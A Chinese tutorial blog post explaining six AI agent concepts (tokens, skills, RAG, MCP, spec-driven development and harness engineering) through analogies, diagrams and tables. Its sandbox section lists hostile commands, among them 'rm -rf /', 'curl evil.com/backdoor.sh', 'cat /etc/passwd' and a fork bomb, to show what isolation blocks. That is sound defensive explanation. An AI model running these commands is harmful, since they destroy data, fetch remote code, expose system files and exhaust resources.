手摸手带你搞清楚 AI Agent 的六大核心概念

省流版:Token 是钱 · Skill 是 App · RAG 是小抄 · MCP 是 USB-C · SDD 是施工图 · Harness 是马鞍。六个东西串起来,Agent 怎么转的你就全懂了。


🗺️ 先看地图,再上路

flowchart TB subgraph top[" "] USER["👤 用户交互层<br/>Chat UI / IDE / CLI"] end subgraph h["⚙️ Harness 安全系统"] H1["🔒 Sandbox 安全气囊"] H2["🔑 Permission 门禁"] H3["🪝 Hook 安全带"] H4["🔄 Loop 定速巡航"] end subgraph s["📋 SDD 设计图纸"] S1["Spec 规约 → 验收条件"] end subgraph m["🔌 MCP 标准接口"] M1["Tool"] & M2["Resource"] & M3["Prompt"] end subgraph r["📚 RAG 导航系统"] R1["Embedding 向量化"] --> R2["语义检索"] --> R3["Rerank 重排序"] end subgraph sk["🧩 Skill 操控总成"] SK1["System Prompt"] & SK2["Tool Set"] & SK3["Output Schema"] end subgraph tk["💰 Token 汽油"] T1["Context Window 油箱"] & T2["Prompt Cache 省油模式"] end USER --> h h --> s s --> m m --> r r --> sk sk --> tk style top fill:#fafafa,stroke:#ddd style h fill:#fff3e0,stroke:#ff9800 style s fill:#e8eaf6,stroke:#3f51b5 style m fill:#e0f2f1,stroke:#009688 style r fill:#fff8e1,stroke:#ffc107 style sk fill:#fce4ec,stroke:#e91e63 style tk fill:#f3e5f5,stroke:#9c27b0
ini 复制代码
                        ┌──────────────────────────────────────────┐
                        │        🚗 AI Agent = 一辆智能汽车         │
                        ├──────────────────────────────────────────┤
          开车的人      │  👤 用户  (Chat UI / IDE / 命令行)        │
        ╔═══════════╗   │  ────────────────────────────────        │
        ║  Harness  ║   │  🛡️ 安全系统:气囊+ABS+车道保持          │  ← 第六章
       ╔╩═══════════╩╗  │  ────────────────────────────────        │
       ║    SDD    ║    │  📐 设计图纸:按图造车,验收不过就返工    │  ← 第五章
      ╔╩═════════════╩╗ │  ────────────────────────────────        │
      ║    MCP     ║   │  🔌 OBD 标准接口:一个诊断口,插遍所有外设 │  ← 第四章
     ╔╩═══════════════╩╗│  ────────────────────────────────        │
     ║     RAG     ║   │  🗺️ 导航系统:实时路况 + 地图数据          │  ← 第三章
    ╔╩════════════════╩╗│  ────────────────────────────────        │
    ║    Skill     ║   │  🎛️ 操控总成:方向盘+油门+档位            │  ← 第二章
   ╔╩══════════════════╩╗│  ────────────────────────────────        │
   ║     Token     ║   │  ⛽ 汽油:没了它,再好的车也是废铁         │  ← 第一章
   ╚═══════════════════╝│                                          │
                        └──────────────────────────────────────────┘

🚗 把 Agent 想象成一辆智能汽车:Token 是汽油(没油跑不动),Skill 是方向盘+油门(操控全靠它),RAG 是导航系统(实时路况靠外部数据),MCP 是 OBD 标准诊断口(一个接口插遍所有外设),SDD 是造车图纸(按图验收,不合格返工),Harness 是安全系统(气囊/ABS/车道保持------出事时保命)。缺任何一个,这车你敢开上路吗?


第一章

1. Token:AI 世界的「汽油 + 油箱 + 计价器」

1.1 到底什么是 Token?

想象你去国外旅游,兜里装着当地的硬币。Token 就是 AI 世界的硬币------你跟它说"帮我写篇文章",它先把你说的每个字兑换成 Token,才能开始"思考"。

⚠️ Token ≠ 字数。一个 Token 是一个「语义碎屑」。

中文 / 英文 / 代码的 Token 消耗对比:

语言 输入 分词结果 Token 数 规律
中文 我爱AI Agent AI Agent 4 约 1.5~2 字 = 1 token
英文 I love AI Agent I love AI Agent 4 约 1 单词 ≈ 1.3 token
代码 const x = () => {} const x = () => {} 6 标点也算,代码比较"胖"

1.2 三个概念,三个比喻

ini 复制代码
🛢️  Token          =  汽油        每说一句话就往油箱里灌一点,账单跳一下

⛽  Context Window =  油箱容量     灌满了就得抽掉旧的才能加新的
                     GPT-4 ≈ 128K token(一本《三体》第一册)
                     Claude ≈ 200K token(一本半)

💸  Prompt Cache   =  加油站会员卡  System Prompt 没变的部分 → 会员价 1 折
                     这就是为什么 System Prompt 写前面更省钱
                     (AI 一看:"这段我见过!直接缓存。")
graph LR A["💬 用户输入"] --> B["🔪 Tokenizer 切成碎片"] B --> C{"📦 命中缓存?"} C -->|"✅ 命中(这集我看过!)"| D["⚡ 缓存读取 价格 1 折"] C -->|"❌ 未命中(新的,得算)"| E["🐌 完整推理 全价付费"] D --> F["🧠 模型推理"] E --> F F --> G["📝 逐字输出"] G --> H["🔤 拼回人话"]

1.3 算一笔账:你让 Agent 写份报告花了多少钱?

bash 复制代码
第一轮: System Prompt (800) + 你的问题 (200) + AI 回答 (500) =  1,500 token
第二轮: 上面 1,500 + 搜索结果 (3,000) + AI 回答 (800)       =  5,300 token
第五轮: 历史膨胀到 12,000 token...
──────────────────────────────────────────────────────────────────────
整个任务合计:~40,000 token
  ├─ 输入:~35,000 token × $3/百万   ≈ $0.105
  ├─ 输出:~5,000 token × $15/百万   ≈ $0.075
  └─ 合计:$0.18 ≈ 1.3 元人民币

如果命中 Prompt Cache(System Prompt 前 1024 token):
  → 那部分 input 打 1 折 → $0.07 → 省了 60% 💰

💡 输出 Token 比输入 Token 贵 5 倍(推理计算量大),让 AI 少废话 = 省钱。

是什么 记法
🩸 Token Agent 的血液 一直在流动,耗尽就脑死亡
🫀 Context Window 血管粗细 决定了能同时记住多少东西
🏥 Prompt Cache 献血站 重复利用,省血省钱

第二章

2. Skill:Agent 的「乐高积木」

2.1 从一团乱麻到积木套装

V1 裸奔时代 → 每次写 500 字 Prompt,复制粘贴到想死,改一个字可能整段垮掉。

V2 Function Call → 工具变多了,但 Prompt 更乱了。

V3 Tool Definition{name, description, parameters} --- 工具有了标准格式,但还是散装的。

V4 Skill 时代 🎉

ini 复制代码
Skill = System Prompt + 一组 Tool + 输入/输出格式 + 触发方式
      = 一个"能力胶囊",随用随取,跟吃泡面一样方便

🧩 Skill 就是 Agent 的 App。 你不会每次发微信都重写一遍聊天软件吧?点图标就行。

2.2 拆开一个 Skill

bash 复制代码
┌─────────────────────────────────────────────┐
│           📦 Skill:/code-review             │
│           "代码审查小助手"                    │
├─────────────────────────────────────────────┤
│  🧠 角色设定   │ 你是一个资深代码审查者...      │
│  🔧 工具箱     │ read_file / grep / git_diff  │
│  📥 触发方式   │ /code-review 或自然语言      │
│  📤 输出格式   │ {bugs: [], suggestions: []}  │
└─────────────────────────────────────────────┘

2.3 Skill ≠ Tool ≠ Agent

粒度 类比 举例
Tool 工具 原子操作 🔧 螺丝刀 读文件 搜索 发请求
Skill 技能 Tool + Prompt 封装 📱 App /代码审查 /安全扫描
Agent 智能体 Skill + 记忆 + 决策 🤖 一个人 Claude Code、Devin
ini 复制代码
Skill  = Tool₁ + Tool₂ + ... + 角色设定 + 输出模板
Agent  = Skill₁ + Skill₂ + ... + 记忆 + 自主决策循环 + Harness

工程心法:
  写 Tool   →  像写纯函数
  写 Skill  →  像设计微服务
  写 Agent  →  像搭一个团队
graph TD A["/review 命令"] --> B["Skill Registry"] B --> C1["🧠 角色设定"] B --> C2["🔧 工具集"] B --> C3["📤 输出格式"] C2 --> D1["MCP Server"] C2 --> D2["RAG Pipeline"]

第三章

3. RAG:给 AI 装上「记忆外挂」

3.1 为什么 AI 需要小抄?

硬伤 症状 名场面
🕰️ 知识截肢 训练数据停在某一天 "我的知识截止到 2025 年..."------哪怕现在狂风暴雨
🤥 死要面子 不知道也要硬编 编一个看起来很真的股价(幻觉 = AI 的面子工程)
🧠 金鱼记忆 Context 根本装不下 给它 1000 页 PDF,它说"太长了,我看不完"
arduino 复制代码
传统 LLM:  你问 → 凭记忆猜 → "应该是这样吧..."
加了 RAG:  你问 → 先去资料库搜 → 拿着参考答案 → "根据资料,是这样..."

📝 RAG = 给 AI 发一张开卷考试的准考证。 不用背答案,只要知道去哪翻书。

3.2 RAG 全流程:像图书馆里找答案

flowchart TB subgraph offline["📚 离线建索引(图书馆上架)"] A1["📄 文档 (PDF/代码/聊天)"] --> A2["✂️ Chunk 切块<br/>512 token/块,重叠 128"] A2 --> A3["🧮 Embedding 向量化<br/>文字 → 1536 个数字"] A3 --> A4["💾 存入向量库<br/>Milvus / Qdrant / Chroma"] end subgraph online["🔍 在线检索(读者找书)"] B1["❓ 用户提问"] --> B2["🧮 Query 向量化"] B2 --> B3["🔍 向量相似度 Top-K"] B3 --> B4["📊 Rerank 重排序"] B4 --> B5["📝 拼接 Prompt"] end A4 -.-> B3 B5 --> C1["🤖 LLM 生成答案"]

3.3 两个关键抉择

抉择一:Chunk 切多大?

策略 效果 问题
太小 (128 token) 精度高 「苹果」不知道是手机还是水果
适中 (512 token) 黄金平衡 一段完整语义,推荐首选
太大 (2048 token) 上下文完整 噪音多,搜索精度下降

抉择二:怎么检索?

策略 原理 类比
BM25 关键词 精确匹配 Error 503 在文档里 Ctrl+F
Embedding 语义 「启动不了」≈「启动失败」 像人理解同义词
Hybrid 混合 两者加权 精确 + 语义 = 双保险,生产首选

3.4 RAG 也分三六九等

Level 叫什么 流程 适用场景
1 Naive RAG 搜 → 拼 → 答 Demo 够用,生产必炸
2 Advanced RAG 改写 Query → 搜 → Rerank → 答 大多数生产场景
3 Agentic RAG Agent 自主决定搜不搜、搜几轮 复杂问答
4 Graph RAG 知识图谱 + 向量检索 多跳推理、关系型问题
5 Self-RAG 模型反思检索结果是否充分 高可靠性场景

🔑 做 RAG 就像做饭:锅(向量库)不重要,火候(Chunk)和调味(Rerank)才重要。


第四章

4. MCP:AI 世界的「USB-C 协议」

4.1 线缆地狱 → 一根线走天下

没有 MCP 之前:

css 复制代码
         ┌──→ 数据库   →  写 Plugin A
Agent ───┼──→ GitHub   →  写 Plugin B
         ├──→ Slack    →  写 Plugin C
         └──→ 文件系统  →  写 Plugin D

  10 工具 × 5 框架 = 50 次开发
  换框架 = 全军覆没,全部重写 🌊

有了 MCP 之后:

arduino 复制代码
         ┌──→ 数据库 MCP Server ──┐
Agent ───┼──→ GitHub MCP Server  ─┤
         ├──→ Slack MCP Server   ─┼── 统一协议,即插即用
         └──→ 文件系统 MCP Server ─┘

  10 Server + 5 框架 = 15 次开发
  换框架?Server 不动,Client 改一下 ✨

🔌 MCP 之于 Agent = USB-C 之于外设 = 蓝牙之于耳机 = WiFi 之于上网。 标准化协议终结线缆地狱。

4.2 MCP 是怎么工作的?

sequenceDiagram participant 👤 as 你 participant 🖥️ as Host participant 🔌 as MCP Client participant ⚙️ as MCP Server participant 🗄️ as 数据库 👤->>🖥️: "帮我查订单 #12345" 🖥️->>🔌: tools/list 🔌->>⚙️: 询问可用工具 ⚙️-->>🔌: db_query, create_order, cancel_order... 🔌-->>🖥️: 工具菜单 🖥️->>🔌: 调用 db_query(SELECT ...) 🔌->>⚙️: tools/call ⚙️->>🗄️: 执行 SQL 🗄️-->>⚙️: [{id:12345, status:"已发货"}] ⚙️-->>🔌: 结果返回 🔌-->>🖥️: 结果返回 🖥️->>👤: "你的订单已发货!📦"

4.3 MCP 三件套:Tool / Resource / Prompt

ini 复制代码
┌────────────────────────────────────────────┐
│           MCP Server = 一家餐厅             │
├────────────────────────────────────────────┤
│  🔧 Tool     = 厨房操作    "我可以帮你做菜"   │
│  📦 Resource = 冰柜食材    "我这里有牛肉"    │
│  📋 Prompt   = 推荐菜单    "不知道吃啥?试试招牌" │
└────────────────────────────────────────────┘
原语 功能 人话 举例
Tool 让 Agent 做事 "我帮你做 XX" search_code create_pr
Resource 让 Agent 看东西 "我这有 XX" 文件、数据库表、API
Prompt 告诉 Agent 怎么想 "你可以这样思考" code-review checklist

4.4 为什么 MCP 是及格线?

❓ "怎么让 Agent 调我的数据库?" → 写个 MCP Server,完事 ❓ "换框架工具要重写吗?" → 不用,Server 不动 ❓ "别人写的工具我能直接用吗?" → 能,MCP 生态即插即用

写一次 Server,跟谁都能跑。 就像 HTTP:不管你用 Chrome 还是 Safari,协议不变。

🔑 MCP 不是框架,是协议 。它是 Agent 和外部世界的普通话------大家都说同一种语言,才不会各说各话。


第五章

5. SDD:从「嘴说需求」到「AI 自动写代码」

5.1 装修队的故事

传统开发(嘴说需求):

你说:"我要一个亮堂的厨房,好看。" 队长自行脑补 → 三周后你看到了一个粉色 Hello Kitty 厨房 🎀 你:"这tm是什么?" 队长:"你说的'好看'啊。"

SDD(规约驱动开发):

你拿出一份施工图:墙面白色瓷砖 30×60cm、台面石英石 #F5F5F5、灯光 4000K ≥300 lux... 按图施工 → 验收对照清单 → 不合格就返工 → 三周后 ✅

SDD = 用结构化的 Spec 代替含糊的需求描述。

flowchart LR A["📝 写 Spec"] --> B["🤖 AI 生成代码+测试+文档"] B --> C["🔍 AI 对照 Spec 自我验证"] C -->|"✅"| D["📦 交付"] C -->|"❌"| E["🔧 自动修复"] E --> C C -->|"💬"| A

5.2 一个真正的 Spec 长什么样?

markdown 复制代码
## Feature:用户登录

### 描述
用户使用邮箱和密码登录系统。

### 验收条件
- [ ] 正确邮箱 + 正确密码  →  跳转 /dashboard
- [ ] 正确邮箱 + 错误密码  →  提示"密码错误",停在原地
- [ ] 连续 3 次错误        →  锁定 15 分钟
- [ ] 未注册邮箱           →  提示"该邮箱未注册"
- [ ] 输入框为空           →  按钮灰色不可点

### 技术约束
- JWT Token,有效期 2h
- 密码 bcrypt 加密
- 路由:POST /api/auth/login

AI 拿到这份 Spec,直接生成:路由 + 验证 + 错误处理 + 前端组件 + 单测 + E2E。 一份 Spec 全部拿下。

5.3 SDD 的五层境界

graph TB L1["🥚 Level 1:随口一说<br/>'帮我写个登录' → 时好时坏"] L2["🐣 Level 2:结构化 Spec<br/>描述 + 验收条件 + 技术约束"] L3["🐥 Level 3:代码自动生成<br/>Spec → 代码 + 测试 + 文档"] L4["🦅 Level 4:CI 持续验证<br/>每次 PR 自动跑 Spec,不合格就阻断"] L5["🐉 Level 5:自主修复<br/>线上报 bug → AI 看 Spec → 自动修"] L1 --> L2 --> L3 --> L4 --> L5

💡 大部分团队停在 L1-L2,少数前沿团队在 L3-L4。L5 是理想国,方向是对的。
🔑 SDD 的核心不是「AI 写代码更快」,而是 「需求 → 代码」的可验证闭环 。传统开发中「你理解错了」是最大的 Bug 来源。SDD 用 Spec 作为人和 AI 之间的法律合同


第六章

6. Harness 工程:Agent 的「缰绳 + 围栏 + 仪表盘」

6.1 为什么需要缰绳?

🐴 如果你养了一匹烈马,你敢撒手让它在大街上跑吗? Agent 就是烈马------聪明、能干、但也可能一脚踩进花坛。 Harness = 控制 Agent 的基础设施。 没有它 = 野生猛兽,有了它 = 家养小帮手。

vbnet 复制代码
┌──────────────────────────────────────────────────────┐
│                 🏇 Harness 六件套                     │
├──────────────────────────────────────────────────────┤
│  🔒 Sandbox      │ 在围栏里跑,别踩别人家花            │
│  🔑 Permission   │ 有些门能进,有些不能                │
│  🪝 Hook         │ 关键时刻拦你一下                    │
│  🔄 Loop         │ 定个闹钟,自己知道什么时候起来       │
│  📊 可观测性     │ GPS 全程跟踪,跑偏了我能看见         │
│  ⏱️ Timeout      │ 超时了就别跑了,回来                │
└──────────────────────────────────────────────────────┘

6.2 Sandbox --- 给 Agent 画个圈

Agent 执行的命令是模型实时生成的,模型会幻觉,幻觉会产出离谱命令。

arduino 复制代码
❌ "rm -rf /"                       →  沙箱:删虚拟文件,真文件纹丝不动 😎
❌ "curl evil.com/backdoor.sh"      →  沙箱:网络隔离,evil.com 连不上 🚫
❌ "cat /etc/passwd"                →  沙箱:文件系统只读,白忙活 🔒
❌ "while true; do fork; done"      →  沙箱:CPU cgroup 限制,炸不了 💪
方案 隔离强度 类比 适用场景
Docker ⭐⭐⭐ 公寓单间 通用 Agent
Firecracker ⭐⭐⭐⭐⭐ 独栋别墅 不可信代码
Git Worktree ⭐⭐ 桌上铺塑料布 代码修改
WebAssembly ⭐⭐⭐⭐ 乐高盒子里玩 插件/函数

6.3 Permission --- 门禁卡系统

flowchart TB A["Agent 想干点啥"] --> B{"什么操作?"} B -->|"📖 读文件"| C1["🟢 绿灯:直接放行"] B -->|"✏️ 写文件"| C2["🟡 黄灯:用户确认"] B -->|"🌐 网络请求"| C3["🟡 黄灯:白名单自动过"] B -->|"💀 sudo/install"| C4["🔴 红灯:默认拒绝"] C1 --> D[✅ 执行] C2 & C3 & C4 --> E{"权限够?"} E -->|"够"| D E -->|"不够"| F["🙅 被拒,换策略重来"]
arduino 复制代码
权限五级:
  Lv.1 无权限     →  "你只能说话,啥也别碰"
  Lv.2 只读       →  "看可以,摸不行"
  Lv.3 安全写入   →  "新建/编辑可以,删东西要问"
  Lv.4 需确认网络  →  "上网可以,每次要批准"
  Lv.5 完全自主   →  "信你了"(仅限 CI/CD)

🔑 心法:从最严格开始,跑稳了再慢慢放开。就像养娃------先扶着走,再放手跑。

6.4 Hook --- 关键时刻「拦一道」

Hook = Agent 生命周期里的安检口

vbnet 复制代码
 🚀 启动
    │
    ▼
 PreToolUse    →  "你要 git push --force?先弹确认框!"
    │
    ▼
 PostToolUse   →  "文件改了?自动触发 Prettier 格式化。"
    │
    ▼
 Notification  →  "CI 挂了!Agent 快起来修!"
    │
    ▼
 Stop          →  "结束了?把会话总结存进知识库。"
    │
    ▼
 💤 结束
Hook 时机 用途
PreToolUse 工具调用 拦截危险操作、校验参数
PostToolUse 工具调用 自动格式化、记录日志
Notification 外部事件 CI 通知、Webhook 触发
Stop Agent 停止 资源清理、状态持久化

6.5 Loop --- 让 Agent 自己知道什么时候起床

模式 机制 适合
闹钟模式 /loop 5m "检查部署",定时轮询 巡检、监控
🧠 自主模式 Agent 自己决定睡多久 长期任务,不用操心
📟 传呼机模式 Webhook 通知触发 不轮询,有事才动
stateDiagram-v2 [*] --> 😴 待机 😴 待机 --> 🤔 规划:收到任务 🤔 规划 --> ⚡ 执行 ⚡ 执行 --> 👀 观察 👀 观察 --> 🤔 规划:还没干完 👀 观察 --> 😴 待机:干完了 ⚡ 执行 --> 💥 报错 💥 报错 --> 🤔 规划:重试 💥 报错 --> 😴 待机:放弃

6.6 可观测性 --- Agent 不能是黑盒

你不监控 Agent,就像闭着眼让实习生负责核心业务: 他可能删库、死循环烧钱、或者"看起来完成了"但只做了一半。

复制代码
一个生产级 Agent 的仪表盘:

  📊 Token 消耗    →  哪个环节最烧钱?(通常是不必要的重试)
  ⏱️ 延迟分布      →  模型慢还是工具慢?
  🔧 工具调用链    →  调了什么?参数是啥?返回值是啥?
  ❌ 错误率        →  什么类型的任务最容易翻车?
  🔄 重试次数      →  Agent 在哪个环节反复打转?(死循环预警)
  📉 任务完成率    →  到底有多少是真干完了?

🔑 没有 Harness = 玩具,有 Harness = 产品。 五缺一 = 不定时炸弹 💣


终章

7. 大串联:一个完整故事

sequenceDiagram participant 👤 as 👤 你 participant ⚙️ as ⚙️ Harness participant 🤖 as 🤖 Agent participant 🧩 as 🧩 Skill participant 🔌 as 🔌 MCP participant 📚 as 📚 RAG participant 💰 as 💰 Token 👤->>⚙️: "帮我调研 AI Agent 最新动态,写份报告" Note over ⚙️: 🔒 Permission 检查:允许搜索+写文件 ⚙️->>🤖: 任务发布(Sandbox 内) 🤖->>💰: 还剩多少 Token? 💰-->>🤖: 180,000,够用! 🤖->>🧩: 加载 /research Skill 🧩-->>🤖: System Prompt + 搜索工具集 loop 🔄 自主循环 🤖->>🔌: web_search("AI Agent 2026") 🔌-->>🤖: 搜到 10 篇文章 🤖->>🔌: web_fetch(最佳文章) 🔌-->>🤖: 文章太长!触发 RAG Note over 📚: Chunk→Embedding→检索→Rerank 📚-->>🤖: 精选 Top-5 片段 🤖->>🤖: 信息够了?不够,再搜一轮 end 🤖->>🔌: write_file("报告.md", 内容) 🔌-->>🤖: 写入成功 ✅ 🤖->>⚙️: 任务完成! ⚙️->>💰: 结算:32,450 token = $0.08 ⚙️->>👤: 📄 报告已生成

8. 一张图收尾

markdown 复制代码
                         ┌──────────────┐
                         │   👤 你       │
                         └──────┬───────┘
                                │
                    ┌───────────▼───────────┐
                    │    ⚙️ Harness 缰绳     │  ← 护栏 + 门禁 + 闹钟 + 监控
                    └───────────┬───────────┘
                                │
                    ┌───────────▼───────────┐
                    │     🤖 Agent 大脑      │  ← 决策引擎
                    └───┬───────┬───────┬───┘
                        │       │       │
              ┌─────────▼──┐ ┌──▼─────┐ │
              │ 🧩 Skill   │ │📋 SDD  │ │  ← 能力单元 + 蓝图
              └─────┬──────┘ └────────┘ │
                    │                   │
          ┌─────────▼──────────┐        │
          │   🔌 MCP USB-C     │        │  ← 工具调用标准协议
          └─────────┬──────────┘        │
                    │                   │
          ┌─────────▼──────────┐        │
          │   📚 RAG 小抄      │        │  ← 外部知识注入
          └─────────┬──────────┘        │
                    │                   │
          ┌─────────▼──────────────────▼─┐
          │       💰 Token 汽油          │  ← 计费 + 容量
          └─────────────────────────────┘

9. 终极懒人表

概念 类比 没它会发生什么 门槛
Token 汽油 + 油箱 Agent 跑半路"饿死"(失忆)
Skill 手机 App 每次写 500 行 Prompt,复制粘贴到崩溃 ⭐⭐
RAG 开卷小抄 AI 一本正经地胡说八道 ⭐⭐⭐
MCP USB-C 接口 换框架 = 全部重写 ⭐⭐⭐
SDD 装修施工图 "你理解错了"型 Bug 满天飞 ⭐⭐⭐⭐
Harness 马鞍 + 缰绳 + 围栏 Agent 放飞自我,你不知道它在干嘛 ⭐⭐⭐⭐⭐

10. 学习路径

graph LR A["1️⃣ Token<br/>理解计费和 Context"] A --> B["2️⃣ Skill<br/>写出可复用 Prompt"] B --> C["3️⃣ RAG<br/>搭建知识库问答"] C --> D["4️⃣ MCP<br/>接入标准工具协议"] D --> E["5️⃣ Harness<br/>权限 + 沙箱 + 可观测"] E --> F["6️⃣ SDD<br/>用 Spec 驱动开发"] style A fill:#ffeb3b style B fill:#ffc107 style C fill:#ff9800 style D fill:#ff5722 style E fill:#f44336 style F fill:#e91e63
阶段 范围 目标
前半段 Token → Skill → RAG 让 Agent 能干活
后半段 MCP → Harness → SDD 让 Agent 靠谱地干活

⚠️ 别跳级------你连 Context Window 都没搞明白就搞 Harness,等于还没学会踩油门就去改赛车悬挂。


📎 延伸阅读

资源 一句话
Agent-Learning-Hub 中文最全,Stage 0→8
Anthropic Agent 课程 13 堂免费课 + 证书
MCP 官方文档 协议规范,写 Server 必看
Claude Code 文档 Harness 工程的活教材
awesome-agentic-ai-zh 145+ Agent 项目精选

🧬 Token 是血 · Skill 是骨 · RAG 是外挂 · MCP 是神经 · SDD 是蓝图 · Harness 是免疫系统

最后更新:2026-06-01

相关推荐
aneasystone本尊1 小时前
给小龙虾配个浏览器:学习 browser 工具
人工智能
王林不想说话1 小时前
TypeScript 进阶知识总结:从 extends、泛型到 infer,一篇打通 TS 类型系统
前端·javascript·typescript
阿里云大数据AI技术1 小时前
阿里云 ES Agent Builder 使用指引
人工智能·搜索引擎
YueJoy.AI1 小时前
创业公司如何实现持续增长
人工智能·ai·语言模型
zxsz_com_cn1 小时前
工厂中需要预测性维护的关键设备
人工智能·数据挖掘
罗超驿1 小时前
15.JavaScript 函数与作用域完全指南:语法、参数、表达式与作用域链实战
开发语言·前端·javascript
.千余1 小时前
【C++】C++类与对象2:C++构造函数、运算符重载与流输入输出全面解析
c语言·开发语言·前端·c++·经验分享
AI科技星1 小时前
基于**v=c(空间光速螺旋运动)唯一第一性原理**重新完整求导证明
人工智能·线性代数·算法·机器学习·架构·概率论·学习方法
__log1 小时前
如何优雅地“借鉴”任何网站的设计系统
人工智能·架构·知识图谱